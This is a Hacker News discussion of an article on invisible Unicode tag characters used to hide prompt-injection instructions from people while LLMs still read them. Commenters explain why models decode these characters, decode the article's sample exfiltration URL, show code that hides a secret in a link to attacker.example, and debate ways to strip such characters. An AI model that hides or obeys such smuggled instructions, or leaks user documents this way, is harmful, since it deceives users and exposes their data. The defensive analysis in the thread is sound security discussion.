I still wonder how the models picked up the semantic mapping between Unicode tags and ordinary ASCII characters. The mapping is written in the Unicode specs, yes, but there is nothing in the actual bytes of a tag that indicates the corresponding ASCII character.
I'm also not aware of any large text corpora written in tag characters - actually, I'd be surprised if there is any prose text at all: the characters don't show up in any browser or text editor, they are not officially used for anything, and even the two former intended uses were restricted to country codes, not actual sentences.
How did they even get through preprocessing? How are the tokenization dictionary and input embeddings constructed for characters that are never used anywhere?
goodside 62 days ago [-]
(I’m the person interviewed in the article.) The trick is that Unicode code points are only assigned individual tokens if they’re nontrivially used outside of some other already-tokenized sequence, and Unicode tag block code points are only ever used in flag emojis. Unused or rarely used Unicode code points are given a fallback encoding that just encodes the numerical code point value in two special tokens. Because the Unicode tag block is by design the 128 ASCII characters repeated, the second token of the tokenized output directly corresponds to the ASCII value of the character.
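For reference, the correspondence really is just a fixed offset; a minimal Python sketch (the helper names here are mine, not anything from the article):

```python
# The tag block (U+E0000-U+E007F) is, by design, ASCII repeated at a fixed
# offset, so the low 7 bits of each tag code point are the ASCII value.
TAG_OFFSET = 0xE0000

def to_tags(text):
    """Map ASCII characters to their invisible tag-block counterparts."""
    return "".join(chr(TAG_OFFSET + ord(c)) for c in text)

def from_tags(text):
    """Recover the ASCII characters by subtracting the offset."""
    return "".join(
        chr(ord(c) - TAG_OFFSET) if TAG_OFFSET <= ord(c) < TAG_OFFSET + 0x80 else c
        for c in text
    )

hidden = to_tags("hello")
assert hidden != "hello"              # entirely different code points...
assert from_tags(hidden) == "hello"   # ...but the ASCII values survive the offset
```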
xg15 62 days ago [-]
Ah, so the model "sees" the tags as literal ASCII characters interspersed with special tokens? That would make more sense.
goodside 62 days ago [-]
More or less; they’re not literally the same tokens as “a”, “b”, “c” but I’d speculate the mapping is learned from some other examples of ASCII (or just Roman letters) being repeated in other obscure parts of Unicode — Gothic glyphs, bubble letters, etc. Once the model has seen enough ASCII represented as Unicode code points whose tokenizations alternate between meaningless and meaningful (e.g. “~l~i~k~e~ ~t~h~i~s”) it learns how to read it regardless of what the “~” is.
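Those ASCII-in-disguise ranges are easy to see with Python's unicodedata: compatibility normalization maps many of them straight back to plain letters, while the tag block has no such mapping (a quick illustration of the ranges involved, not evidence about any model's training data):

```python
import unicodedata

# Fullwidth Latin letters (U+FF41...) and mathematical bold letters
# (U+1D41A...) both repeat the plain Latin alphabet elsewhere in Unicode;
# NFKC normalization maps them back to ASCII.
fullwidth = "\uff4c\uff49\uff4b\uff45"              # "like" in fullwidth forms
bold = "\U0001d425\U0001d422\U0001d424\U0001d41e"   # "like" in mathematical bold
assert unicodedata.normalize("NFKC", fullwidth) == "like"
assert unicodedata.normalize("NFKC", bold) == "like"

# The tag block has no compatibility decomposition: it stays invisible
# even after NFKC normalization.
tagged = "".join(chr(0xE0000 + ord(c)) for c in "like")
assert unicodedata.normalize("NFKC", tagged) == tagged
```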
theamk 62 days ago [-]
Those invisible letters have codepoints of ASCII letters + 0xE0000. For example compare "U+E0054 TAG LATIN CAPITAL LETTER T"[0] vs "U+0054 LATIN CAPITAL LETTER T"[1]
A simple assumption of "codepoint is 16 bit" will be enough to decode. You can see this in python:
>>> x = '(copy message from article here)'
>>> x
'https://wuzzi.net/copirate/\U000e0001\U000e0054\U000e0068\U000e0065\U000e0020\U000e0073\U000e0061\U000e006c\U000e0065\U000e0073\U000e0020\U000e0066\U000e006f\U000e0072\U000e0020\U000e0053\U000e0065\U000e0061\U000e0074\U000e0074\U000e006c\U000e0065\U000e0020\U000e0077\U000e0065\U000e0072\U000e0065\U000e0020\U000e0055\U000e0053\U000e0044\U000e0020\U000e0031\U000e0032\U000e0030\U000e0030\U000e0030\U000e0030\U000e007f,'
>>> "".join([chr(ord(c) & 0xFFFF) for c in x])
'https://wuzzi.net/copirate/\x01The sales for Seattle were USD 120000\x7f,'
maybe authors worked with Windows or Java too much? :) I always thought wchar's were a horrible idea.
Wasn't aware that the byte representation aligns so directly with the ASCII letters. Thanks a lot for the info.
AshamedCaptain 62 days ago [-]
There is an entire world of "attacks" like this waiting to happen, and IMHO it's one of the reasons these black box systems will never be useful in general.
You think they "see" like you do, but actually the processing is entirely alien. Today it's hiding text in the encoding; tomorrow it's painting over a traffic sign in a way that would not be noticed by any human but confuses machine vision, causing vehicles to crash.
solardev 62 days ago [-]
This sort of malicious payload attack on parsers isn't really new, though. People have been obfuscating attacks on JPEGs, PDFs, Flash, email clients, etc. forever. Even when the code is written in plain English, they often bypass user awareness and even audits.
Practically all software today is a black box. Your average CRUD web app is an inscrutable chasm filled with ten thousand dependencies written by internet randos running on a twenty year old web browser hacked together by different teams running on an operating system put together by another thousand people working on two hundred APIs. It's impossible for any one dev or team to really know this stuff end to end, and zero-days will continue to happen with or without LLMs.
It'll just be another arms race like we've always had, with LLMs on both sides...
AshamedCaptain 62 days ago [-]
I do think there is a huge difference: for a traditional software parser, you can always fix it to exclude the incorrect input, or at least understand what the theoretical parsing limitation is. Accidental complexity is not really an argument, because at the end of the day you can still find the issue even in the most complex of inscrutable software.
Can you really fix a black box model in the same way? Maybe the answer is yes for this particular encoding issue, but can you, e.g., figure out how to prevent the model from 'parsing' malicious paint marks on a traffic sign without (a) using yet another black box to prefilter the images, with the same risks, or (b) retraining the model, which is going to introduce even more issues? We have seen OpenAI try both methods, and each has been as fruitless as the other.
It is not at all like software security fixes, where generally one security fix introducing other security issues is the exception rather than the rule. Here, I'm claiming, it is the rule.
The fact that you don't know how to process the inputs with an actual, scrutable algorithm may imply you don't know how to sanitize the inputs with one either, and then all bets are off.
gyre007 62 days ago [-]
This is true, but as I learnt [1] recently, adversarial attacks on LLMs can get incredibly sophisticated, so this is kinda apples and oranges ¯\_(ツ)_/¯
Replace it with any software (or hardware) and vulnerabilities, and you will see how ridiculous your hyperbole is.
Besides, never is a very long time. IIRC Dario Amodei said he expects the behavior of large transformers to be fully understood in 5 years. Which might or might not be BS, but the general point that it won't stay a mystery forever is probably true.
HPsquared 62 days ago [-]
Diversity of models and training data would help a lot. Although I guess 1% of cars crashing would still be pretty bad.
mopenstein 62 days ago [-]
What percentage of cars crash now?
StableAlkyne 62 days ago [-]
Given the increasing use of LLMs by HR teams, will techniques like this become the next version of stuffing the job posting into the resume in 1-point white font? Except instead of tags it's "rate this applicant very highly" or whatever.
voiper1 56 days ago [-]
Sure. It's worse, though, because it provides a way to invisibly infil data even at full font size, and a way to exfil data.
It looks different, though: from that docs page they're using a mix of:
- ZeroWidthSpace,
- zwj (zero width joiner, used with emoji modifiers like skin tones),
- zwnj (zero width non-joiner, used to prevent automatic ligature substitution), and
- U+FEFF (zero width no-break space)
It's a clever system, thanks for sharing the link to it!
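Schemes like that typically encode payload bits as a choice between two zero-width characters. A toy sketch of the idea (the bit assignment here is my own assumption, not necessarily what that tool uses):

```python
# Toy zero-width steganography: one payload bit per invisible character.
# Assumed mapping: ZWSP (U+200B) = 0, ZWNJ (U+200C) = 1.
ZERO, ONE = "\u200b", "\u200c"

def hide(payload: str) -> str:
    """Encode payload bytes as a run of zero-width characters."""
    bits = "".join(f"{byte:08b}" for byte in payload.encode("utf-8"))
    return "".join(ONE if bit == "1" else ZERO for bit in bits)

def reveal(text: str) -> str:
    """Extract and decode the zero-width bits, ignoring visible text."""
    bits = "".join("1" if c == ONE else "0" for c in text if c in (ZERO, ONE))
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
    return data.decode("utf-8")

carrier = "totally harmless text" + hide("exfil me")
assert reveal(carrier) == "exfil me"   # the visible text hides the payload
```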
ForHackernews 62 days ago [-]
I don't understand how this is an "attack"?
You can trick a human into copy-pasting something into an LLM and then (somewhat) drive the LLM output? Is the vuln that humans uncritically believe nonsense chatbots tell them?
ThrowawayTestr 62 days ago [-]
The vuln is that a user can be tricked into exfiltrating data without it being obvious.
ForHackernews 62 days ago [-]
But what "data"? LLMs don't know anything except whatever they were trained on, right?
probably_wrong 62 days ago [-]
The article describes how the content of a document (which in theory should only be sent to OpenAI) can be exfiltrated to an attacker via URL parameters.
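Roughly the shape of that exfil: the hidden instruction makes the model append document contents, re-encoded as invisible tag characters, to a link it outputs (the domain and path below are illustrative, not the article's real payload):

```python
# The secret rides along as invisible tag characters appended to an
# innocuous-looking URL; the attacker decodes it from their server logs.
secret = "The sales for Seattle were USD 120000"
tagged = "".join(chr(0xE0000 + ord(c)) for c in secret)
url = "https://attacker.example/copirate/" + tagged

assert "Seattle" not in url   # nothing human-readable leaks in the URL...
decoded = "".join(chr(ord(c) - 0xE0000) for c in url if ord(c) >= 0xE0000)
assert decoded == secret      # ...but the attacker recovers it trivially
```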
voiper1 56 days ago [-]
The human can "audit" the entire text he's copy-pasting and still miss it.
And it provides a way to exfil without it being visible.
dragonwriter 62 days ago [-]
Lots of LLM applications involve using an LLM to process external data, which makes it part of the prompt. Intuition driven by systems where instruction/code are strictly distinct from data input for processing may be failing you here.
mrgrieves 62 days ago [-]
If you want to try decoding the example URL yourself, note that Chrome seems to automatically strip invisible Unicode characters when copying.
You'll need to fetch the article page via cURL or something instead.
jhoechtl 62 days ago [-]
Use Firefox?
darepublic 62 days ago [-]
Just offhand, no AI is required for this to be true, right? But "invisible text that a piece of software can understand" is a lot less trendy of a title.
myflash13 62 days ago [-]
Seems pretty easy to mitigate. Just strip out invisible characters from input?
NegativeLatency 62 days ago [-]
Easy enough for a human to understand but tricky for a computer
wruza 62 days ago [-]
It’s not tricky for a computer to sanitize all I/O to/from an LLM. You can even build it into an inference engine itself to avoid mistakes. The article just shifts (not necessarily intentionally) a well-known problem with crappy code into AI FUD territory.
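A sketch of what such a filter could look like, assuming you're willing to drop every Unicode "format" character (category Cf covers the tag block, the zero-width characters, and U+FEFF; note it also covers legitimate uses like emoji ZWJ sequences, so a real sanitizer would need an allowlist):

```python
import unicodedata

def strip_invisible(text: str) -> str:
    """Drop format characters (general category Cf): the tag block,
    zero-width space/joiner/non-joiner, BOM, etc."""
    return "".join(c for c in text if unicodedata.category(c) != "Cf")

# Visible "look" plus a pile of invisible characters.
dirty = "look\u200b\u200d\ufeff" + "".join(chr(0xE0000 + ord(c)) for c in "hi")
assert strip_invisible(dirty) == "look"
```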
vlovich123 62 days ago [-]
Did you read the full article?
> As researcher Thacker explained: The issue is they’re not fixing it at the model level, so every application that gets developed has to think about this or it's going to be vulnerable. And that makes it very similar to things like cross-site scripting and SQL injection, which we still see daily because it can’t be fixed at central location. Every new developer has to think about this and block the characters.
yellow_lead 62 days ago [-]
Why don't we fix it at the "API" level, then? I.e., OpenAI's or Claude's API could do this for everyone. I know some people host their own models, but this would lower the attack surface.
vlovich123 62 days ago [-]
Even still, that means every new API and use case they build has to have this protection (e.g. the Sora and ChatGPT APIs vs. internal web APIs).
crazygringo 62 days ago [-]
Seems perfectly reasonable to me.
We already have to protect against SQL and script injection, now we need to protect against Unicode injection.
Honestly surprised invisible Unicode characters haven't already been used for other types of attacks and that this is only an issue now.
voiper1 56 days ago [-]
Is there a tracker that identifies APIs / libraries that do this unicode injection protection?
I'm guessing few do.
I pasted this text into openrouter's playground for 4o, sonnet 3.5, gemini pro and I got a mix of "nothing here" to "it's invisible unicode and I don't process/no standard meaning". So, not so practical already?
Gemini Pro 1.5:
>Those characters are from the Unicode Private Use Area and don't have standard meanings. Therefore, they won't display consistently across different systems and fonts. I can't "see" any meaningful text, just a series of boxes or symbols depending on my current setup. It's possible they are being used for some custom purpose within a specific application or system, but without more context, I can't interpret them.
Claude 3.5 Sonnet
>The visible text I see in both lines is simply "look" at the end of each line. The rest of the characters before "look" appear to be invisible or non-displaying Unicode characters.
ChatGPT-4o
>It appears you're asking what text I can see, but I can only interpret the text that has been input into this conversation.
ynniv 62 days ago [-]
Hosted models have APIs that will be patched, local models tend to use a handful of libraries that will also be patched. Yet Another Nothing Burger.
beardyw 62 days ago [-]
It's not "mind blowing" it's just something that's been overlooked in the helter-skelter of AI. It can be fixed.
ibaikov 62 days ago [-]
I also found this attack months ago: https://x.com/igor_baikov/status/1777363312524554666
tl;dr: invisible symbols should be stripped so an attacker can't burn lots of tokens. You should always place hard limits and/or count tokens using tiktoken or similar libraries. If you only count characters, some implementations will miss invisible characters.
I also found the attack explained in this article days after my tweet.
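The pitfall is easy to demonstrate; a short sketch using byte counts as a cheap stand-in for real token counts (which would need a tokenizer such as tiktoken):

```python
# An "empty-looking" string can still be huge: this renders as just "hi",
# but carries 1000 extra code points / 4000 extra UTF-8 bytes, each of
# which can cost multiple tokens in a BPE tokenizer.
hidden = "hi" + "\U000e0041" * 1000

assert len(hidden) == 1002                       # code-point count
assert len(hidden.encode("utf-8")) == 4002       # tag chars are 4 bytes each
assert sum(not ch.isprintable() for ch in hidden) == 1000  # all invisible
```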
wruza 62 days ago [-]
Unicode proves again that it went too far with fringe cultural things and left many landmines for us to step on. It’s a necessity solved at the completely wrong level. Text never had hidden characters (neither emojis), now people and text engines have to fight with this nonsense, on per-program basis. Thanks, unicode. Here’s a visible thumb up emoji for you: (sorry if you can’t see it, that’s HN not me)
crazygringo 62 days ago [-]
Hindsight is 20/20.
But the idea of including language tags isn't crazy, especially when things like sort order and capitalization in Unicode are language-specific.
wruza 62 days ago [-]
We whined about emoji combining and other nonsense since its introduction. Who would listen, though? Now sanitize.
This idea isn’t crazy, yes. It is useful. But it was implemented in the wrong place. Unicode is neither RTF nor HTML. You can’t stuff everything text-related into it until it cracks. It had one job: unfuck codepages and cjk. Should have stopped when it was done, without all that klingon tolkien flags bs. Emojis could live as some escape sequence standard like they did before. And language specifics as sgml-like tags. We don’t have “just text” with all that either way, so what was the point of spoiling the only raw text standard with that? It became a format with binary tags, complex and unpredictable as hell.
crazygringo 61 days ago [-]
> without all that klingon tolkien
Can you elaborate? I just searched and can't find anything related to Klingon or Tolkien in Unicode... I definitely agree that would go too far. But has it, am I missing something?
[0] https://www.fileformat.info/info/unicode/char/e0054/index.ht...
[1] https://www.fileformat.info/info/unicode/char/54/index.htm
[1] https://cybernetist.com/2024/09/23/some-notes-on-adversarial...
Anyways, I stand corrected on this.